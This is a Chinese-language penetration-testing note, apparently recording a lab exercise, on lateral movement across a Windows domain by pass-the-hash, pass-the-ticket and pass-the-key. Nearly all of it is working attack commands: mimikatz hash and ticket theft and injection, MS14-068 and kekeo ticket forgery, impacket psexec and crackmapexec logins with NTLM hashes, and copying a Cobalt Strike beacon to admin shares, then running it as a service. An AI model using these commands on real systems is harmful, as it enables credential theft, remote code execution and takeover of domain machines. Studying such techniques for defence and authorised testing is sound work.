0x00前言
pass the hash(哈希传递攻击,简称pth)
pass the ticket(票据传递攻击,简称ptt)
pass the key(密钥传递攻击,简称ptk)
PTH(pass the hash) #利用的lm或ntlm的值进行的渗透测试(NTLM认证攻击)
PTK(pass the key) #利用的ekeys aes256进行的渗透测试(NTLM认证攻击)
PTT(pass the ticket) #利用的票据凭证TGT进行渗透测试(Kerberos认证攻击)
当wmi,smb协议被禁用了,可以利用ptt,pth,ptk等方式进行横向移动
复现环境:
准备:
cs上线 win web
提权(为了抓取hash和明文密码,权限不够抓不到)
抓取hash和明文密码
开启socks服务器(代理服务器ip为cs服务端ip)
代理转发-》转发上线-》绑定监听器-》生成木马-》上传到win web服务器根目录下
0x01横向移动 PTH
注意现在windows大多操作系统使用的密码散列值是NTLM,在老版本win,winxp中使用的密码散列值是LM,都是个加密算法
1.mimiakatz(不推荐,弹cmd,能连上rdp时可以使用)
ip不行时就用主机名连接域用户,导入到了内存中,之后利用票据在进行以下操作mimikatz sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7连接本地用户mimikatz privilege::debugmimikatz sekurlsa::pth /user:administrator /domain:sqlserver /ntlm:518b98ad4178a53695dc997aa02d455cnet use \\192.168.3.32\c$copy beacon.exe \\192.168.3.32\c$sc \\sqlserver create bshell binpath= "c:\4.exe"sc \\sqlserver start bshell
成功连接
上线成功:
2.impaket-atexec wmiexec smbexec psexec
本地用户执行命令psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"弹cmdpsexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32域用户psexec -hashes :518b98ad4178a53695dc997aa02d455c god/administrator@192.168.3.32
其他命令类似,都可以弹cmd或者执行命令,之后都是从web服务器(192.168.3.31)下载木马并执行木马
3.crackmapexec
使用工具可以判断hash值和用户名是否匹配
#域用户HASH登录proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c#本地用户HASH登录,-x参数执行命令proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c --local-auth
0x02横向移动 PTT
1.漏洞(ms14-068) 伪造新用户身份
获取SID值:shell whoami/user生成票据文件(在本地开代理执行或上传执行都可以,本地执行需要上传票据)shell ms14-068.exe -u webadmin@ -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!@#45清除票据连接shell klist purge查看但前票据shell klist内存导入票据 (cs自带mimakatz)mimikatz kerberos::ptc TGT_webadmin@ache查看目标主机目录结构shell dir \\OWACN-GOD\c$连接目标上线shell net use \\OWACN-GOD\C$copy beacon.exe \\OWACN-GOD\C$sc \\OWACN-GOD create bindshell binpath= "c:\beacon.exe"sc \\OWACN-GOD start bindshell
注意直接用ip连时连不上的,需要用计算机名
2.kekeo 利用ntml生成新的票据
主要是看是不是高权限的ntml,这样生成的票据才能够成功
生成票据(在本地开代理执行或上传执行都可以,本地执行需要上传票据)shell kekeo "tgt::ask /user:Administrator /domain: /ntlm:ccef208c6485269c20db2cad21734fe7" "exit"导入票据shell kekeo "kerberos::ptt TGT_Administrator@_krbtgt~@.kirbi" "exit"查看票据(cs自带命令)shell klist利用票据连接shell dir \\owacn-god\c$
3.mimiakatz 利用的历史遗留票据
主要是看域管理员等一些高权限用户是否登陆过,并且票据没有过期,mimikatz抓取密码时权限要高权限用户才能抓取
导出票据mimikatz sekurlsa::tickets /export导入票据mimikatz kerberos::ptt C:\Users\webadmin\Desktop\[0;22d3a]-2-1-40e00000-Administrator@krbtgt-.kirbi查看票据shell klist利用票据连接shell dir \\owacn-god\c$
0x03横向移动 PTK
利用条件:
当系统安装了KB2871997补丁且禁用了NTLM
抓取aes256的值
mimikatz sekurlsa::ekeysmimikatz sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值
